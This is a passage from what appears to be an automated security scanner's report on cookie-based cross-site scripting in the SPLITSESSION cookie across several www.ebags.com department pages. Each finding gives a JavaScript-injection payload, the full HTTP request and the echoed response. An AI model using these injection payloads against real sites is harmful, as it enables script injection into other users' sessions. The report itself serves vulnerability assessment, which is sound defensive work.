Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C36c7b'%3balert(1)//46d70b3c5ca; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:10:55 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:10:55 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 106075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|36c7b';alert(1)//46d70b3c5ca');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.51. http://www.ebags.com/department/backpacks [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/backpacks

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce005'%3balert(1)//2bba8979327 was submitted in the SPLITSESSION cookie. This input was echoed as ce005';alert(1)//2bba8979327 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /department/backpacks HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cce005'%3balert(1)//2bba8979327; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:44 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:44 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 72517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|ce005';alert(1)//2bba8979327');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.52. http://www.ebags.com/department/bags-by-ebags [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/bags-by-ebags

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daeeb'%3balert(1)//84748baca02 was submitted in the SPLITSESSION cookie. This input was echoed as daeeb';alert(1)//84748baca02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /department/bags-by-ebags HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cdaeeb'%3balert(1)//84748baca02; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:15 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:15 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 59464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|daeeb';alert(1)//84748baca02');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.53. http://www.ebags.com/department/business-and-laptop [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/business-and-laptop

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2144'%3balert(1)//62264d29455 was submitted in the SPLITSESSION cookie. This input was echoed as e2144';alert(1)//62264d29455 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /department/business-and-laptop HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Ce2144'%3balert(1)//62264d29455; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:08:03 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:08:03 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 76321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|e2144';alert(1)//62264d29455');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.54. http://www.ebags.com/department/designer-handbags [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/designer-handbags

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f77f7'%3balert(1)//ef3d048712a was submitted in the SPLITSESSION cookie. This input was echoed as f77f7';alert(1)//ef3d048712a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /department/designer-handbags HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cf77f7'%3balert(1)//ef3d048712a; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:34 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:06:34 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 58402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','BECOME01$COUPONID=40959822');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|f77f7';alert(1)//ef3d048712a');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.55. http://www.ebags.com/department/handbags [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/handbags

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84047'%3balert(1)//6c6d777cb40 was submitted in the SPLITSESSION cookie. This input was echoed as 84047';alert(1)//6c6d777cb40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /department/handbags HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C84047'%3balert(1)//6c6d777cb40; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:37 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:37 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 71505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|84047';alert(1)//6c6d777cb40');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.56. http://www.ebags.com/department/kids-and-baby [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/kids-and-baby

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79b06'%3balert(1)//f0d2e35aa8e was submitted in the SPLITSESSION cookie. This input was echoed as 79b06';alert(1)//f0d2e35aa8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /department/kids-and-baby HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C79b06'%3balert(1)//f0d2e35aa8e; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:09:30 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:09:30 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 65101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|79b06';alert(1)//f0d2e35aa8e');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.57. http://www.ebags.com/department/luggage [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/luggage

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80dc1'%3balert(1)//d3996fefb2c was submitted in the SPLITSESSION cookie. This input was echoed as 80dc1';alert(1)//d3996fefb2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /department/luggage HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C80dc1'%3balert(1)//d3996fefb2c; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

1.58. http://www.ebags.com/department/messenger-bags [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/messenger-bags

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5b7a'%3balert(1)//f4eb8fb3d72 was submitted in the SPLITSESSION cookie. This input was echoed as a5b7a';alert(1)//f4eb8fb3d72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /department/messenger-bags HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Ca5b7a'%3balert(1)//f4eb8fb3d72; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

1.59. http://www.ebags.com/department/sale [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/sale

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7302c'%3balert(1)//ca8b38adb31 was submitted in the SPLITSESSION cookie. This input was echoed as 7302c';alert(1)//ca8b38adb31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /department/sale HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C7302c'%3balert(1)//ca8b38adb31; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:08:58 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:08:58 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 87023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|7302c';alert(1)//ca8b38adb31');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.60. http://www.ebags.com/department/snow-and-skate [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/snow-and-skate

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6da2d'%3balert(1)//f4a0cd679c7 was submitted in the SPLITSESSION cookie. This input was echoed as 6da2d';alert(1)//f4a0cd679c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /department/snow-and-skate HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C6da2d'%3balert(1)//f4a0cd679c7; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

1.61. http://www.ebags.com/department/sports-and-duffels [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/sports-and-duffels

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83a31'%3balert(1)//4d05bbfeabd was submitted in the SPLITSESSION cookie. This input was echoed as 83a31';alert(1)//4d05bbfeabd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

